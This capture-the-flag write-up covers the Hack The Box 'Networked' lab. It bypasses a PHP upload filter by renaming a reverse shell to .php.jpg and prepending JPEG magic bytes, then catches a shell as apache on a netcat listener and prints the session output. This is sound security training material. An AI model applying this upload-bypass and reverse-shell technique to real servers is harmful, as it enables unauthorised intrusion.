Arbitrary File Upload


Based on the analysis made, it would appear that I will be able to exploit the file upload feature in the web server.

The file upload feature contains four security measures:

  • Extension/Type
  • Size
  • MIME type
  • IP filter

All four need to be taken care of for a successful exploitation.

The payload size is about 9.1K bytes, which does not exceed the 60k size limit. I do not need to worry about the IP filter either, as my IP address starts with 10.10.

That leaves me 2 things to work with

Extension/Type


The allowed extensions are .jpg, .png, .gif, .jpeg

I will go with .jpg

┌──(kali㉿kali)-[~/archive/htb/labs/networked]
└─$ mv shell.php shell.php.jpg

I changed the file extension to .php.jpg, so the file will now pass the extension filter. Because the browser sets the Content-Type of a multipart file part from the file extension, the Content-Type header should now automatically be set to an image type.

Mime Type (Magic Number)


According to Wikipedia, .jpg files start with the hex signature FF D8 FF E0 (FF D8 FF is the JPEG start-of-image marker; E0 is the JFIF APP0 marker). Each pair of hex digits is one byte, just as each ASCII character is one byte, so the signature is 4 bytes long.

┌──(kali㉿kali)-[~/archive/htb/labs/networked]
└─$ sed -i '1s/^/AAAA\n/' shell.php.jpg

First, I prepend 4 A's to the top of the payload. The sed command inserts the line AAAA before the first line, so the file now starts with the four bytes 41 41 41 41 followed by a newline, and the original PHP follows untouched.

┌──(kali㉿kali)-[~/archive/htb/labs/networked]
└─$ hexeditor shell.php.jpg

I will then open up the payload using hexeditor to modify those 4 A’s

The first 4 bytes of the file are 41 41 41 41, which is A in ASCII. Those are the 4 A's that I prepended earlier.

I changed those 4 A's to FF D8 FF E0 to match the hex signature of a .jpg file.

This should bypass the MIME filter (check_file_type) in the lib.php file, since that check looks at the magic number at the start of the file rather than the extension. PHP outputs the bytes before the opening <?php tag as plain text, so the reverse shell code itself still executes.

Exploitation


Uploading the payload

As can be seen, the Content-Type header has already been set to image/jpeg based on the .jpg extension.

Upload is complete

Triggering the payload by navigating to /photos.php, I can see the uploaded payload. The browser hangs because the web server executes the PHP reverse shell embedded in the payload while loading /photos.php.

┌──(kali㉿kali)-[~/archive/htb/labs/networked]
└─$ nnc 9999                    
listening on [any] 9999 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.146] 46014
SOCKET: Shell has connected! PID: 4406
whoami
apache
hostname
networked.htb
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:99:2f brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.146/24 brd 10.10.10.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:992f/64 scope global mngtmpaddr dynamic 
       valid_lft 86398sec preferred_lft 14398sec
    inet6 fe80::250:56ff:feb9:992f/64 scope link 
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as apache via arbitrary file upload.